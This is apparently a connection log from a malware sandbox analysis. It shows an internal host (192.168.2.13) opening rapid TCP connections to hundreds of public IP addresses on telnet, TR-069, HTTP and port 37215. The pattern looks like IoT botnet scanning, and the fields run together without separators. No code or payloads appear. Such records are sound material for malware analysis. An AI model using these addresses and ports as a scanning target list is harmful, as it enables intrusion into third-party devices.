                                          Nov 7, 2024 11:57:58.392369032 CET30567547192.168.2.13155.208.183.235
                                          Nov 7, 2024 11:57:58.392369986 CET331223192.168.2.13142.121.147.161
                                          Nov 7, 2024 11:57:58.392379045 CET233312138.105.105.159192.168.2.13
                                          Nov 7, 2024 11:57:58.392380953 CET30567547192.168.2.13176.210.20.212
                                          Nov 7, 2024 11:57:58.392380953 CET30567547192.168.2.13137.227.15.121
                                          Nov 7, 2024 11:57:58.392386913 CET233312129.3.14.255192.168.2.13
                                          Nov 7, 2024 11:57:58.392386913 CET331223192.168.2.1366.163.190.7
                                          Nov 7, 2024 11:57:58.392386913 CET30567547192.168.2.1337.46.5.132
                                          Nov 7, 2024 11:57:58.392393112 CET30567547192.168.2.1348.31.106.105
                                          Nov 7, 2024 11:57:58.392395973 CET233312131.37.133.39192.168.2.13
                                          Nov 7, 2024 11:57:58.392395973 CET30567547192.168.2.13107.66.72.9
                                          Nov 7, 2024 11:57:58.392395973 CET30567547192.168.2.13180.119.25.113
                                          Nov 7, 2024 11:57:58.392404079 CET23233312155.130.102.8192.168.2.13
                                          Nov 7, 2024 11:57:58.392405033 CET30567547192.168.2.13193.87.42.15
                                          Nov 7, 2024 11:57:58.392405033 CET30567547192.168.2.13180.188.4.110
                                          Nov 7, 2024 11:57:58.392405987 CET30567547192.168.2.13197.30.143.24
                                          Nov 7, 2024 11:57:58.392410994 CET233312163.40.20.142192.168.2.13
                                          Nov 7, 2024 11:57:58.392414093 CET30567547192.168.2.1397.38.217.139
                                          Nov 7, 2024 11:57:58.392417908 CET23331253.95.188.14192.168.2.13
                                          Nov 7, 2024 11:57:58.392417908 CET30567547192.168.2.1325.92.37.11
                                          Nov 7, 2024 11:57:58.392420053 CET30567547192.168.2.13115.90.164.194
                                          Nov 7, 2024 11:57:58.392421007 CET30567547192.168.2.13181.28.125.226
                                          Nov 7, 2024 11:57:58.392425060 CET30567547192.168.2.1370.134.222.96
                                          Nov 7, 2024 11:57:58.392431974 CET30567547192.168.2.13137.253.168.235
                                          Nov 7, 2024 11:57:58.392431974 CET30567547192.168.2.1386.27.172.113
                                          Nov 7, 2024 11:57:58.392431974 CET30567547192.168.2.1320.209.42.39
                                          Nov 7, 2024 11:57:58.392447948 CET331223192.168.2.13131.37.133.39
                                          Nov 7, 2024 11:57:58.392448902 CET331223192.168.2.13211.203.171.23
                                          Nov 7, 2024 11:57:58.392448902 CET33122323192.168.2.13155.130.102.8
                                          Nov 7, 2024 11:57:58.392457008 CET30567547192.168.2.1353.255.164.6
                                          Nov 7, 2024 11:57:58.392457962 CET331223192.168.2.13163.40.20.142
                                          Nov 7, 2024 11:57:58.392457962 CET331223192.168.2.13129.3.14.255
                                          Nov 7, 2024 11:57:58.392457962 CET331223192.168.2.13138.105.105.159
                                          Nov 7, 2024 11:57:58.392462015 CET30567547192.168.2.1347.90.56.188
                                          Nov 7, 2024 11:57:58.392462015 CET331223192.168.2.1353.95.188.14
                                          Nov 7, 2024 11:57:58.392462015 CET30567547192.168.2.1395.143.8.11
                                          Nov 7, 2024 11:57:58.392466068 CET30567547192.168.2.13176.91.206.182
                                          Nov 7, 2024 11:57:58.392488956 CET30567547192.168.2.1314.130.134.24
                                          Nov 7, 2024 11:57:58.392496109 CET30567547192.168.2.13151.130.255.217
                                          Nov 7, 2024 11:57:58.392513037 CET30567547192.168.2.13212.39.27.126
                                          Nov 7, 2024 11:57:58.392517090 CET30567547192.168.2.13209.32.183.236
                                          Nov 7, 2024 11:57:58.392522097 CET30567547192.168.2.1317.131.213.38
                                          Nov 7, 2024 11:57:58.392534971 CET30567547192.168.2.13114.167.115.79
                                          Nov 7, 2024 11:57:58.392535925 CET30567547192.168.2.1362.172.116.37
                                          Nov 7, 2024 11:57:58.392540932 CET30567547192.168.2.13139.213.4.19
                                          Nov 7, 2024 11:57:58.392544031 CET30567547192.168.2.13172.207.52.80
                                          Nov 7, 2024 11:57:58.392544031 CET30567547192.168.2.13113.23.43.207
                                          Nov 7, 2024 11:57:58.392551899 CET30567547192.168.2.1393.113.190.198
                                          Nov 7, 2024 11:57:58.392559052 CET30567547192.168.2.13216.164.38.183
                                          Nov 7, 2024 11:57:58.392564058 CET30567547192.168.2.1365.81.134.201
                                          Nov 7, 2024 11:57:58.392570972 CET30567547192.168.2.1370.30.232.4
                                          Nov 7, 2024 11:57:58.392570972 CET30567547192.168.2.1394.87.113.102
                                          Nov 7, 2024 11:57:58.392573118 CET30567547192.168.2.13160.160.179.142
                                          Nov 7, 2024 11:57:58.392579079 CET30567547192.168.2.13135.234.8.207
                                          Nov 7, 2024 11:57:58.392584085 CET30567547192.168.2.1388.64.7.89
                                          Nov 7, 2024 11:57:58.392585039 CET30567547192.168.2.13119.203.94.222
                                          Nov 7, 2024 11:57:58.392592907 CET30567547192.168.2.13115.206.218.94
                                          Nov 7, 2024 11:57:58.392601967 CET30567547192.168.2.1319.89.5.242
                                          Nov 7, 2024 11:57:58.392601967 CET30567547192.168.2.1334.116.230.201
                                          Nov 7, 2024 11:57:58.392613888 CET30567547192.168.2.1318.139.104.158
                                          Nov 7, 2024 11:57:58.392621040 CET30567547192.168.2.13157.98.87.221
                                          Nov 7, 2024 11:57:58.392625093 CET23331289.153.207.175192.168.2.13
                                          Nov 7, 2024 11:57:58.392637014 CET233312124.225.211.33192.168.2.13
                                          Nov 7, 2024 11:57:58.392649889 CET23331295.75.253.253192.168.2.13
                                          Nov 7, 2024 11:57:58.392658949 CET331223192.168.2.1389.153.207.175
                                          Nov 7, 2024 11:57:58.392662048 CET23331223.121.174.92192.168.2.13
                                          Nov 7, 2024 11:57:58.392667055 CET331223192.168.2.13124.225.211.33
                                          Nov 7, 2024 11:57:58.392676115 CET23331250.22.151.61192.168.2.13
                                          Nov 7, 2024 11:57:58.392678976 CET331223192.168.2.1395.75.253.253
                                          Nov 7, 2024 11:57:58.392699003 CET331223192.168.2.1323.121.174.92
                                          Nov 7, 2024 11:57:58.392721891 CET233312186.198.250.34192.168.2.13
                                          Nov 7, 2024 11:57:58.392733097 CET2333122.168.80.181192.168.2.13
                                          Nov 7, 2024 11:57:58.392745018 CET2333121.198.187.4192.168.2.13
                                          Nov 7, 2024 11:57:58.392750025 CET331223192.168.2.13186.198.250.34
                                          Nov 7, 2024 11:57:58.392756939 CET233312166.172.109.29192.168.2.13
                                          Nov 7, 2024 11:57:58.392770052 CET23233312102.61.117.64192.168.2.13
                                          Nov 7, 2024 11:57:58.392771959 CET331223192.168.2.1350.22.151.61
                                          Nov 7, 2024 11:57:58.392777920 CET331223192.168.2.131.198.187.4
                                          Nov 7, 2024 11:57:58.392782927 CET233312138.136.132.124192.168.2.13
                                          Nov 7, 2024 11:57:58.392785072 CET331223192.168.2.13166.172.109.29
                                          Nov 7, 2024 11:57:58.392787933 CET331223192.168.2.132.168.80.181
                                          Nov 7, 2024 11:57:58.392803907 CET33122323192.168.2.13102.61.117.64
                                          Nov 7, 2024 11:57:58.392810106 CET233312110.218.241.154192.168.2.13
                                          Nov 7, 2024 11:57:58.392813921 CET331223192.168.2.13138.136.132.124
                                          Nov 7, 2024 11:57:58.392822981 CET23331273.123.25.202192.168.2.13
                                          Nov 7, 2024 11:57:58.392838001 CET2333125.185.3.170192.168.2.13
                                          Nov 7, 2024 11:57:58.392843008 CET331223192.168.2.13110.218.241.154
                                          Nov 7, 2024 11:57:58.392851114 CET23331291.98.200.129192.168.2.13
                                          Nov 7, 2024 11:57:58.392862082 CET331223192.168.2.1373.123.25.202
                                          Nov 7, 2024 11:57:58.392863035 CET233312179.204.124.183192.168.2.13
                                          Nov 7, 2024 11:57:58.392868996 CET331223192.168.2.135.185.3.170
                                          Nov 7, 2024 11:57:58.392877102 CET23233312176.133.64.66192.168.2.13
                                          Nov 7, 2024 11:57:58.392887115 CET331223192.168.2.1391.98.200.129
                                          Nov 7, 2024 11:57:58.392889023 CET331223192.168.2.13179.204.124.183
                                          Nov 7, 2024 11:57:58.392890930 CET23331268.27.161.2192.168.2.13
                                          Nov 7, 2024 11:57:58.392904043 CET233312116.96.35.22192.168.2.13
                                          Nov 7, 2024 11:57:58.392918110 CET33122323192.168.2.13176.133.64.66
                                          Nov 7, 2024 11:57:58.392926931 CET23331272.215.189.23192.168.2.13
                                          Nov 7, 2024 11:57:58.392939091 CET233312145.145.81.5192.168.2.13
                                          Nov 7, 2024 11:57:58.392946005 CET331223192.168.2.13116.96.35.22
                                          Nov 7, 2024 11:57:58.392951965 CET23331298.108.52.182192.168.2.13
                                          Nov 7, 2024 11:57:58.392960072 CET331223192.168.2.1372.215.189.23
                                          Nov 7, 2024 11:57:58.392966032 CET233312109.42.181.206192.168.2.13
                                          Nov 7, 2024 11:57:58.392968893 CET331223192.168.2.13145.145.81.5
                                          Nov 7, 2024 11:57:58.392970085 CET331223192.168.2.1368.27.161.2
                                          Nov 7, 2024 11:57:58.392980099 CET233312181.143.145.183192.168.2.13
                                          Nov 7, 2024 11:57:58.392987013 CET331223192.168.2.1398.108.52.182
                                          Nov 7, 2024 11:57:58.392992973 CET233312141.71.122.189192.168.2.13
                                          Nov 7, 2024 11:57:58.393007994 CET23331241.198.39.179192.168.2.13
                                          Nov 7, 2024 11:57:58.393008947 CET331223192.168.2.13181.143.145.183
                                          Nov 7, 2024 11:57:58.393017054 CET331223192.168.2.13109.42.181.206
                                          Nov 7, 2024 11:57:58.393021107 CET2323331234.59.58.112192.168.2.13
                                          Nov 7, 2024 11:57:58.393022060 CET331223192.168.2.13141.71.122.189
                                          Nov 7, 2024 11:57:58.393033028 CET233312143.44.21.74192.168.2.13
                                          Nov 7, 2024 11:57:58.393033981 CET331223192.168.2.1341.198.39.179
                                          Nov 7, 2024 11:57:58.393050909 CET33122323192.168.2.1334.59.58.112
                                          Nov 7, 2024 11:57:58.393062115 CET331223192.168.2.13143.44.21.74
                                          Nov 7, 2024 11:57:58.393656969 CET254480192.168.2.13112.14.180.55
                                          Nov 7, 2024 11:57:58.393713951 CET254480192.168.2.13112.203.183.55
                                          Nov 7, 2024 11:57:58.393713951 CET254480192.168.2.13112.255.144.148
                                          Nov 7, 2024 11:57:58.393723011 CET254480192.168.2.13112.208.231.53
                                          Nov 7, 2024 11:57:58.393760920 CET254480192.168.2.13112.135.238.18
                                          Nov 7, 2024 11:57:58.393764019 CET254480192.168.2.13112.183.42.155
                                          Nov 7, 2024 11:57:58.393774986 CET254480192.168.2.13112.149.224.89
                                          Nov 7, 2024 11:57:58.393779039 CET254480192.168.2.13112.180.140.37
                                          Nov 7, 2024 11:57:58.393785000 CET254480192.168.2.13112.179.235.236
                                          Nov 7, 2024 11:57:58.393837929 CET254480192.168.2.13112.124.158.203
                                          Nov 7, 2024 11:57:58.393837929 CET254480192.168.2.13112.147.37.12
                                          Nov 7, 2024 11:57:58.393865108 CET254480192.168.2.13112.113.35.50
                                          Nov 7, 2024 11:57:58.393892050 CET254480192.168.2.13112.185.126.152
                                          Nov 7, 2024 11:57:58.393892050 CET254480192.168.2.13112.77.169.188
                                          Nov 7, 2024 11:57:58.393908024 CET254480192.168.2.13112.79.177.115
                                          Nov 7, 2024 11:57:58.393923044 CET254480192.168.2.13112.192.202.118
                                          Nov 7, 2024 11:57:58.393927097 CET254480192.168.2.13112.216.135.198
                                          Nov 7, 2024 11:57:58.393928051 CET254480192.168.2.13112.38.216.166
                                          Nov 7, 2024 11:57:58.393975019 CET254480192.168.2.13112.106.210.145
                                          Nov 7, 2024 11:57:58.393981934 CET254480192.168.2.13112.95.88.198
                                          Nov 7, 2024 11:57:58.393981934 CET254480192.168.2.13112.136.233.176
                                          Nov 7, 2024 11:57:58.393990993 CET254480192.168.2.13112.1.56.147
                                          Nov 7, 2024 11:57:58.394001961 CET254480192.168.2.13112.173.241.180
                                          Nov 7, 2024 11:57:58.394038916 CET254480192.168.2.13112.192.102.150
                                          Nov 7, 2024 11:57:58.394047022 CET254480192.168.2.13112.46.98.249
                                          Nov 7, 2024 11:57:58.394054890 CET254480192.168.2.13112.4.134.139
                                          Nov 7, 2024 11:57:58.394089937 CET254480192.168.2.13112.86.181.18
                                          Nov 7, 2024 11:57:58.394094944 CET254480192.168.2.13112.124.251.144
                                          Nov 7, 2024 11:57:58.394171953 CET254480192.168.2.13112.118.111.37
                                          Nov 7, 2024 11:57:58.394171953 CET254480192.168.2.13112.210.93.81
                                          Nov 7, 2024 11:57:58.394217014 CET254480192.168.2.13112.141.204.252
                                          Nov 7, 2024 11:57:58.394223928 CET254480192.168.2.13112.91.144.181
                                          Nov 7, 2024 11:57:58.394223928 CET254480192.168.2.13112.138.190.145
                                          Nov 7, 2024 11:57:58.394242048 CET254480192.168.2.13112.112.94.162
                                          Nov 7, 2024 11:57:58.394243002 CET254480192.168.2.13112.56.146.108
                                          Nov 7, 2024 11:57:58.394263029 CET254480192.168.2.13112.73.161.13
                                          Nov 7, 2024 11:57:58.394263029 CET254480192.168.2.13112.221.185.52
                                          Nov 7, 2024 11:57:58.394303083 CET254480192.168.2.13112.118.53.27
                                          Nov 7, 2024 11:57:58.394309044 CET254480192.168.2.13112.200.196.184
                                          Nov 7, 2024 11:57:58.394320011 CET254480192.168.2.13112.18.198.203
                                          Nov 7, 2024 11:57:58.394366980 CET254480192.168.2.13112.205.37.84
                                          Nov 7, 2024 11:57:58.394370079 CET254480192.168.2.13112.55.184.26
                                          Nov 7, 2024 11:57:58.394387007 CET254480192.168.2.13112.125.202.153
                                          Nov 7, 2024 11:57:58.394391060 CET254480192.168.2.13112.124.66.92
                                          Nov 7, 2024 11:57:58.394391060 CET254480192.168.2.13112.79.11.133
                                          Nov 7, 2024 11:57:58.394409895 CET254480192.168.2.13112.223.160.83
                                          Nov 7, 2024 11:57:58.394412041 CET254480192.168.2.13112.128.111.115
                                          Nov 7, 2024 11:57:58.394412041 CET254480192.168.2.13112.133.211.216
                                          Nov 7, 2024 11:57:58.394453049 CET254480192.168.2.13112.244.209.92
                                          Nov 7, 2024 11:57:58.394453049 CET254480192.168.2.13112.126.185.102
                                          Nov 7, 2024 11:57:58.394459009 CET254480192.168.2.13112.231.58.71
                                          Nov 7, 2024 11:57:58.394479036 CET254480192.168.2.13112.221.172.251
                                          Nov 7, 2024 11:57:58.394483089 CET254480192.168.2.13112.104.50.53
                                          Nov 7, 2024 11:57:58.394503117 CET254480192.168.2.13112.207.183.144
                                          Nov 7, 2024 11:57:58.394532919 CET254480192.168.2.13112.128.227.225
                                          Nov 7, 2024 11:57:58.394540071 CET254480192.168.2.13112.126.71.197
                                          Nov 7, 2024 11:57:58.394550085 CET254480192.168.2.13112.190.104.131
                                          Nov 7, 2024 11:57:58.394550085 CET254480192.168.2.13112.32.201.239
                                          Nov 7, 2024 11:57:58.394555092 CET254480192.168.2.13112.183.150.240
                                          Nov 7, 2024 11:57:58.394568920 CET254480192.168.2.13112.14.136.243
                                          Nov 7, 2024 11:57:58.394575119 CET254480192.168.2.13112.255.52.64
                                          Nov 7, 2024 11:57:58.394592047 CET254480192.168.2.13112.98.36.165
                                          Nov 7, 2024 11:57:58.394623995 CET254480192.168.2.13112.1.253.92
                                          Nov 7, 2024 11:57:58.394632101 CET254480192.168.2.13112.166.94.189
                                          Nov 7, 2024 11:57:58.394637108 CET254480192.168.2.13112.18.181.203
                                          Nov 7, 2024 11:57:58.394644976 CET254480192.168.2.13112.82.188.185
                                          Nov 7, 2024 11:57:58.394665003 CET254480192.168.2.13112.79.228.189
                                          Nov 7, 2024 11:57:58.394666910 CET254480192.168.2.13112.184.243.4
                                          Nov 7, 2024 11:57:58.394668102 CET254480192.168.2.13112.173.1.102
                                          Nov 7, 2024 11:57:58.394680977 CET254480192.168.2.13112.52.123.175
                                          Nov 7, 2024 11:57:58.394690037 CET254480192.168.2.13112.223.218.12
                                          Nov 7, 2024 11:57:58.394706011 CET254480192.168.2.13112.139.22.222
                                          Nov 7, 2024 11:57:58.394727945 CET254480192.168.2.13112.180.235.176
                                          Nov 7, 2024 11:57:58.394737005 CET254480192.168.2.13112.50.14.191
                                          Nov 7, 2024 11:57:58.394754887 CET254480192.168.2.13112.76.111.166
                                          Nov 7, 2024 11:57:58.394757032 CET254480192.168.2.13112.39.62.227
                                          Nov 7, 2024 11:57:58.394766092 CET254480192.168.2.13112.182.244.38
                                          Nov 7, 2024 11:57:58.394773960 CET254480192.168.2.13112.243.227.110
                                          Nov 7, 2024 11:57:58.394787073 CET254480192.168.2.13112.228.150.8
                                          Nov 7, 2024 11:57:58.394794941 CET254480192.168.2.13112.154.225.60
                                          Nov 7, 2024 11:57:58.394804955 CET254480192.168.2.13112.84.132.148
                                          Nov 7, 2024 11:57:58.394814014 CET254480192.168.2.13112.154.172.39
                                          Nov 7, 2024 11:57:58.394814014 CET254480192.168.2.13112.34.4.229
                                          Nov 7, 2024 11:57:58.394815922 CET254480192.168.2.13112.125.96.232
                                          Nov 7, 2024 11:57:58.394840002 CET254480192.168.2.13112.155.21.197
                                          Nov 7, 2024 11:57:58.394843102 CET254480192.168.2.13112.124.137.79
                                          Nov 7, 2024 11:57:58.394856930 CET254480192.168.2.13112.196.108.49
                                          Nov 7, 2024 11:57:58.394856930 CET254480192.168.2.13112.99.52.241
                                          Nov 7, 2024 11:57:58.394865036 CET254480192.168.2.13112.108.119.179
                                          Nov 7, 2024 11:57:58.394881964 CET254480192.168.2.13112.236.40.216
                                          Nov 7, 2024 11:57:58.394890070 CET254480192.168.2.13112.143.26.69
                                          Nov 7, 2024 11:57:58.394908905 CET254480192.168.2.13112.5.181.241
                                          Nov 7, 2024 11:57:58.394917011 CET254480192.168.2.13112.140.79.28
                                          Nov 7, 2024 11:57:58.394927979 CET254480192.168.2.13112.133.115.15
                                          Nov 7, 2024 11:57:58.394949913 CET254480192.168.2.13112.189.111.26
                                          Nov 7, 2024 11:57:58.394953012 CET254480192.168.2.13112.47.244.103
                                          Nov 7, 2024 11:57:58.394961119 CET254480192.168.2.13112.69.229.252
                                          Nov 7, 2024 11:57:58.394962072 CET254480192.168.2.13112.165.246.153
                                          Nov 7, 2024 11:57:58.394965887 CET254480192.168.2.13112.231.64.120
                                          Nov 7, 2024 11:57:58.394973993 CET254480192.168.2.13112.53.66.17
                                          Nov 7, 2024 11:57:58.394987106 CET254480192.168.2.13112.122.28.145
                                          Nov 7, 2024 11:57:58.394990921 CET254480192.168.2.13112.0.120.162
                                          Nov 7, 2024 11:57:58.394993067 CET254480192.168.2.13112.54.8.168
                                          Nov 7, 2024 11:57:58.395006895 CET254480192.168.2.13112.94.208.38
                                          Nov 7, 2024 11:57:58.395018101 CET254480192.168.2.13112.114.61.114
                                          Nov 7, 2024 11:57:58.395021915 CET254480192.168.2.13112.0.227.222
                                          Nov 7, 2024 11:57:58.395035982 CET254480192.168.2.13112.216.125.130
                                          Nov 7, 2024 11:57:58.395040035 CET254480192.168.2.13112.50.182.10
                                          Nov 7, 2024 11:57:58.395050049 CET254480192.168.2.13112.242.29.47
                                          Nov 7, 2024 11:57:58.395082951 CET254480192.168.2.13112.182.30.41
                                          Nov 7, 2024 11:57:58.395083904 CET254480192.168.2.13112.206.195.144
                                          Nov 7, 2024 11:57:58.395083904 CET254480192.168.2.13112.117.5.208
                                          Nov 7, 2024 11:57:58.395083904 CET254480192.168.2.13112.6.106.197
                                          Nov 7, 2024 11:57:58.395086050 CET254480192.168.2.13112.213.218.74
                                          Nov 7, 2024 11:57:58.395087957 CET254480192.168.2.13112.215.225.195
                                          Nov 7, 2024 11:57:58.395097971 CET254480192.168.2.13112.41.212.34
                                          Nov 7, 2024 11:57:58.395114899 CET254480192.168.2.13112.5.130.210
                                          Nov 7, 2024 11:57:58.395116091 CET254480192.168.2.13112.135.216.166
                                          Nov 7, 2024 11:57:58.395137072 CET254480192.168.2.13112.206.33.156
                                          Nov 7, 2024 11:57:58.395140886 CET254480192.168.2.13112.116.204.241
                                          Nov 7, 2024 11:57:58.395150900 CET254480192.168.2.13112.193.197.20
                                          Nov 7, 2024 11:57:58.395164967 CET254480192.168.2.13112.107.180.115
                                          Nov 7, 2024 11:57:58.395168066 CET254480192.168.2.13112.89.173.3
                                          Nov 7, 2024 11:57:58.395178080 CET3070437215192.168.2.1341.59.180.55
                                          Nov 7, 2024 11:57:58.395178080 CET3070437215192.168.2.1341.253.183.55
                                          Nov 7, 2024 11:57:58.395194054 CET254480192.168.2.13112.5.255.133
                                          Nov 7, 2024 11:57:58.395194054 CET3070437215192.168.2.1341.19.19.139
                                          Nov 7, 2024 11:57:58.395194054 CET3070437215192.168.2.1341.171.132.42
                                          Nov 7, 2024 11:57:58.395194054 CET3070437215192.168.2.1341.211.73.120
                                          Nov 7, 2024 11:57:58.395200014 CET3070437215192.168.2.1341.244.114.13
                                          Nov 7, 2024 11:57:58.395200014 CET254480192.168.2.13112.194.21.46
                                          Nov 7, 2024 11:57:58.395201921 CET3070437215192.168.2.1341.45.74.204
                                          Nov 7, 2024 11:57:58.395203114 CET3070437215192.168.2.1341.121.88.161
                                          Nov 7, 2024 11:57:58.395203114 CET3070437215192.168.2.1341.230.213.30
                                          Nov 7, 2024 11:57:58.395203114 CET254480192.168.2.13112.144.51.6
                                          Nov 7, 2024 11:57:58.395207882 CET3070437215192.168.2.1341.91.221.213
                                          Nov 7, 2024 11:57:58.395220995 CET3070437215192.168.2.1341.211.63.62
                                          Nov 7, 2024 11:57:58.395220995 CET3070437215192.168.2.1341.81.65.48
                                          Nov 7, 2024 11:57:58.395225048 CET3070437215192.168.2.1341.207.193.73
                                          Nov 7, 2024 11:57:58.395239115 CET3070437215192.168.2.1341.212.43.157
                                          Nov 7, 2024 11:57:58.395240068 CET3070437215192.168.2.1341.251.216.75
                                          Nov 7, 2024 11:57:58.395247936 CET3070437215192.168.2.1341.159.40.207
                                          Nov 7, 2024 11:57:58.395251036 CET3070437215192.168.2.1341.242.227.222
                                          Nov 7, 2024 11:57:58.395251989 CET3070437215192.168.2.1341.237.216.101
                                          Nov 7, 2024 11:57:58.395258904 CET3070437215192.168.2.1341.37.114.63
                                          Nov 7, 2024 11:57:58.395258904 CET3070437215192.168.2.1341.111.17.65
                                          Nov 7, 2024 11:57:58.395272970 CET3070437215192.168.2.1341.204.105.61
                                          Nov 7, 2024 11:57:58.395279884 CET3070437215192.168.2.1341.113.1.90
                                          Nov 7, 2024 11:57:58.395282030 CET3070437215192.168.2.1341.170.221.29
                                          Nov 7, 2024 11:57:58.395283937 CET254480192.168.2.13112.251.18.57
                                          Nov 7, 2024 11:57:58.395287991 CET254480192.168.2.13112.213.56.6
                                          Nov 7, 2024 11:57:58.395294905 CET3070437215192.168.2.1341.93.105.87
                                          Nov 7, 2024 11:57:58.395294905 CET3070437215192.168.2.1341.128.120.252
                                          Nov 7, 2024 11:57:58.395298958 CET3070437215192.168.2.1341.109.232.211
                                          Nov 7, 2024 11:57:58.395298958 CET254480192.168.2.13112.232.181.205
                                          Nov 7, 2024 11:57:58.395303965 CET254480192.168.2.13112.190.20.145
                                          Nov 7, 2024 11:57:58.395306110 CET3070437215192.168.2.1341.7.6.246
                                          Nov 7, 2024 11:57:58.395307064 CET254480192.168.2.13112.191.174.72
                                          Nov 7, 2024 11:57:58.395315886 CET3070437215192.168.2.1341.219.6.207
                                          Nov 7, 2024 11:57:58.395311117 CET3070437215192.168.2.1341.189.107.211
                                          Nov 7, 2024 11:57:58.395315886 CET254480192.168.2.13112.23.65.141
                                          Nov 7, 2024 11:57:58.395322084 CET254480192.168.2.13112.16.75.15
                                          Nov 7, 2024 11:57:58.395322084 CET3070437215192.168.2.1341.248.232.93
                                          Nov 7, 2024 11:57:58.395322084 CET254480192.168.2.13112.142.191.86
                                          Nov 7, 2024 11:57:58.395322084 CET254480192.168.2.13112.87.205.241
                                          Nov 7, 2024 11:57:58.395323038 CET3070437215192.168.2.1341.195.104.15
                                          Nov 7, 2024 11:57:58.395322084 CET3070437215192.168.2.1341.62.228.0
                                          Nov 7, 2024 11:57:58.395323038 CET254480192.168.2.13112.250.188.82
                                          Nov 7, 2024 11:57:58.395322084 CET3070437215192.168.2.1341.104.26.41
                                          Nov 7, 2024 11:57:58.395332098 CET254480192.168.2.13112.29.240.147
                                          Nov 7, 2024 11:57:58.395332098 CET3070437215192.168.2.1341.249.182.222
                                          Nov 7, 2024 11:57:58.395339966 CET3070437215192.168.2.1341.98.153.24
                                          Nov 7, 2024 11:57:58.395339966 CET254480192.168.2.13112.104.142.227
                                          Nov 7, 2024 11:57:58.395344019 CET3070437215192.168.2.1341.166.109.110
                                          Nov 7, 2024 11:57:58.395359993 CET3070437215192.168.2.1341.144.86.208
                                          Nov 7, 2024 11:57:58.395359993 CET3070437215192.168.2.1341.138.93.101
                                          Nov 7, 2024 11:57:58.395359993 CET254480192.168.2.13112.82.39.186
                                          Nov 7, 2024 11:57:58.395359993 CET3070437215192.168.2.1341.26.233.152
                                          Nov 7, 2024 11:57:58.395370960 CET3070437215192.168.2.1341.24.155.189
                                          Nov 7, 2024 11:57:58.395375967 CET3070437215192.168.2.1341.8.70.39
                                          Nov 7, 2024 11:57:58.395378113 CET3070437215192.168.2.1341.108.23.85
                                          Nov 7, 2024 11:57:58.395379066 CET254480192.168.2.13112.32.73.92
                                          Nov 7, 2024 11:57:58.395399094 CET3070437215192.168.2.1341.193.252.207
                                          Nov 7, 2024 11:57:58.395399094 CET3070437215192.168.2.1341.111.236.248
                                          Nov 7, 2024 11:57:58.395401001 CET3070437215192.168.2.1341.84.17.178
                                          Nov 7, 2024 11:57:58.395402908 CET3070437215192.168.2.1341.165.116.28
                                          Nov 7, 2024 11:57:58.395404100 CET254480192.168.2.13112.211.209.23
                                          Nov 7, 2024 11:57:58.395404100 CET3070437215192.168.2.1341.210.173.102
                                          Nov 7, 2024 11:57:58.395404100 CET254480192.168.2.13112.177.21.80
                                          Nov 7, 2024 11:57:58.395411968 CET3070437215192.168.2.1341.153.245.187
                                          Nov 7, 2024 11:57:58.395412922 CET254480192.168.2.13112.144.160.87
                                          Nov 7, 2024 11:57:58.395412922 CET3070437215192.168.2.1341.83.243.107
                                          Nov 7, 2024 11:57:58.395415068 CET23331220.186.15.217192.168.2.13
                                          Nov 7, 2024 11:57:58.395423889 CET254480192.168.2.13112.191.184.104
                                          Nov 7, 2024 11:57:58.395425081 CET254480192.168.2.13112.230.70.175
                                          Nov 7, 2024 11:57:58.395425081 CET254480192.168.2.13112.118.19.136
                                          Nov 7, 2024 11:57:58.395430088 CET3070437215192.168.2.1341.88.208.229
                                          Nov 7, 2024 11:57:58.395442009 CET254480192.168.2.13112.223.218.186
                                          Nov 7, 2024 11:57:58.395445108 CET3070437215192.168.2.1341.166.7.160
                                          Nov 7, 2024 11:57:58.395447016 CET3070437215192.168.2.1341.191.107.2
                                          Nov 7, 2024 11:57:58.395452023 CET254480192.168.2.13112.148.47.98
                                          Nov 7, 2024 11:57:58.395467043 CET3070437215192.168.2.1341.99.144.108
                                          Nov 7, 2024 11:57:58.395467043 CET3070437215192.168.2.1341.167.219.98
                                          Nov 7, 2024 11:57:58.395467043 CET254480192.168.2.13112.38.72.240
                                          Nov 7, 2024 11:57:58.395467997 CET331223192.168.2.1320.186.15.217
                                          Nov 7, 2024 11:57:58.395469904 CET254480192.168.2.13112.27.21.21
                                          Nov 7, 2024 11:57:58.395471096 CET3070437215192.168.2.1341.220.68.133
                                          Nov 7, 2024 11:57:58.395471096 CET3070437215192.168.2.1341.1.40.119
                                          Nov 7, 2024 11:57:58.395478964 CET233312106.144.22.217192.168.2.13
                                          Nov 7, 2024 11:57:58.395478964 CET3070437215192.168.2.1341.3.163.32
                                          Nov 7, 2024 11:57:58.395479918 CET3070437215192.168.2.1341.158.46.143
                                          Nov 7, 2024 11:57:58.395493031 CET3070437215192.168.2.1341.176.110.144
                                          Nov 7, 2024 11:57:58.395493984 CET254480192.168.2.13112.56.114.18
                                          Nov 7, 2024 11:57:58.395493984 CET3070437215192.168.2.1341.80.131.154
                                          Nov 7, 2024 11:57:58.395498037 CET3070437215192.168.2.1341.222.106.53
                                          Nov 7, 2024 11:57:58.395502090 CET254480192.168.2.13112.68.162.129
                                          Nov 7, 2024 11:57:58.395504951 CET254480192.168.2.13112.27.2.115
                                          Nov 7, 2024 11:57:58.395509958 CET254480192.168.2.13112.22.69.117
                                          Nov 7, 2024 11:57:58.395509958 CET331223192.168.2.13106.144.22.217
                                          Nov 7, 2024 11:57:58.395519972 CET3070437215192.168.2.1341.86.232.182
                                          Nov 7, 2024 11:57:58.395531893 CET254480192.168.2.13112.219.218.78
                                          Nov 7, 2024 11:57:58.395531893 CET254480192.168.2.13112.167.130.72
                                          Nov 7, 2024 11:57:58.395539999 CET3070437215192.168.2.1341.63.249.88
                                          Nov 7, 2024 11:57:58.395543098 CET3070437215192.168.2.1341.168.218.217
                                          Nov 7, 2024 11:57:58.395554066 CET254480192.168.2.13112.69.243.225
                                          Nov 7, 2024 11:57:58.395554066 CET3070437215192.168.2.1341.200.129.83
                                          Nov 7, 2024 11:57:58.395556927 CET3070437215192.168.2.1341.243.230.215
                                          Nov 7, 2024 11:57:58.395560026 CET254480192.168.2.13112.153.204.243
                                          Nov 7, 2024 11:57:58.395570040 CET254480192.168.2.13112.222.47.183
                                          Nov 7, 2024 11:57:58.395579100 CET3070437215192.168.2.1341.188.21.236
                                          Nov 7, 2024 11:57:58.395579100 CET254480192.168.2.13112.71.174.233
                                          Nov 7, 2024 11:57:58.395581961 CET3070437215192.168.2.1341.76.48.107
                                          Nov 7, 2024 11:57:58.395596027 CET3070437215192.168.2.1341.232.174.217
                                          Nov 7, 2024 11:57:58.395600080 CET3070437215192.168.2.1341.212.194.17
                                          Nov 7, 2024 11:57:58.395602942 CET3070437215192.168.2.1341.53.64.217
